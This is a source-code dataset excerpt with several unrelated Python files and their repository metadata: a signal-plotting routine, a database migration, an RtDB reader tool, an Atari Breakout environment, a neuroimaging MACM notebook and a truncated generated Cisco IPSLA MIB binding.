events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| 33.946429
| 109
| 0.57198
| 681
| 5,703
| 4.707783
| 0.270191
| 0.063631
| 0.03587
| 0.014972
| 0.122271
| 0.092327
| 0.092327
| 0.064255
| 0.026825
| 0.026825
| 0
| 0.022606
| 0.309662
| 5,703
| 167
| 110
| 34.149701
| 0.79172
| 0.307733
| 0
| 0.123711
| 0
| 0
| 0.054445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010309
| false
| 0
| 0.051546
| 0
| 0.061856
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9d9591df2f2c4858eb64ae4def8e712c9e40a0
| 1,183
|
py
|
Python
|
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | null | null | null |
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | 8
|
2021-04-19T17:47:55.000Z
|
2022-02-16T17:40:18.000Z
|
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | null | null | null |
"""Only one validation per mission, user and actor
Revision ID: 1a89721126f7
Revises: fa96dfc8237d
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "1a89721126f7"
down_revision = "fa96dfc8237d"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
| 23.66
| 117
| 0.633136
| 138
| 1,183
| 5.195652
| 0.492754
| 0.09484
| 0.07113
| 0.083682
| 0.147838
| 0.147838
| 0.147838
| 0.147838
| 0.147838
| 0
| 0
| 0.063855
| 0.298394
| 1,183
| 49
| 118
| 24.142857
| 0.8
| 0.148774
| 0
| 0.125
| 0
| 0
| 0.250681
| 0.13624
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9dfa2f69a678e6192380ed28bf692cc55ff822
| 1,979
|
py
|
Python
|
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | 2
|
2021-01-15T13:27:19.000Z
|
2021-08-04T08:40:52.000Z
|
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | null | null | null |
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | 5
|
2018-05-01T10:39:31.000Z
|
2022-03-25T03:02:35.000Z
|
# Copyright 2020 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/python
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| 42.106383
| 186
| 0.723598
| 255
| 1,979
| 5.513725
| 0.513725
| 0.032006
| 0.060455
| 0.024182
| 0.025605
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161443
| 0.145528
| 1,979
| 46
| 187
| 43.021739
| 0.670018
| 0.098535
| 0
| 0
| 0
| 0.0625
| 0.443131
| 0.087838
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1875
| 0
| 0.1875
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9ed7b6294e532592cc4dcafea632566b56df4d
| 2,219
|
py
|
Python
|
algorithms/A3C/atari/atari_env_deprecated.py
|
what3versin/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | 1
|
2018-11-09T02:56:27.000Z
|
2018-11-09T02:56:27.000Z
|
algorithms/A3C/atari/atari_env_deprecated.py
|
syd951186545/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | null | null | null |
algorithms/A3C/atari/atari_env_deprecated.py
|
syd951186545/reinforce_py
|
46769da50aea65346cd3a300b55306d25f1f2683
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
def new_round(self):
if not self.done: # dead but not done
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
obs = self.preprocess(obs)
else: # terminal
self.env.reset()
# No-op
for _ in range(np.random.randint(1, self.noop_max + 1)):
obs, _, done, _ = self.env.step(0)
obs = self.preprocess(obs)
return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
| 32.632353
| 80
| 0.581794
| 297
| 2,219
| 4.175084
| 0.360269
| 0.050806
| 0.033871
| 0.022581
| 0.079032
| 0.051613
| 0.051613
| 0.051613
| 0
| 0
| 0
| 0.019041
| 0.313655
| 2,219
| 67
| 81
| 33.119403
| 0.795141
| 0.054529
| 0
| 0.037037
| 0
| 0
| 0.013397
| 0.010526
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.12963
| 0.018519
| 0.314815
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9f7091809e30b40cd88cb5967081a6b1484eed
| 5,935
|
py
|
Python
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 3
|
2020-10-20T10:24:04.000Z
|
2021-12-20T13:31:01.000Z
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 20
|
2021-03-07T17:18:48.000Z
|
2022-03-09T15:13:02.000Z
|
content/_build/jupyter_execute/macm.py
|
NBCLab/nimare-paper
|
2b9e70febcfde4ca12420adc3c2910ff622252f2
|
[
"MIT"
] | 3
|
2020-05-05T14:42:18.000Z
|
2021-11-30T19:52:27.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or points to cached data if running on neurolibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs- one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.")
| 36.411043
| 392
| 0.752148
| 895
| 5,935
| 4.860335
| 0.351955
| 0.01931
| 0.009195
| 0.009655
| 0.165517
| 0.142989
| 0.108966
| 0.076782
| 0.076782
| 0.01977
| 0
| 0.018387
| 0.147767
| 5,935
| 162
| 393
| 36.635802
| 0.841637
| 0.532435
| 0
| 0.178082
| 0
| 0
| 0.082142
| 0.020535
| 0
| 0
| 0
| 0.006173
| 0
| 1
| 0
| false
| 0
| 0.123288
| 0
| 0.123288
| 0.013699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9f96734192b94aa40844f25ed620f799a5da53
| 50,863
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an UDP echo request message to the
destination and receiving an UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
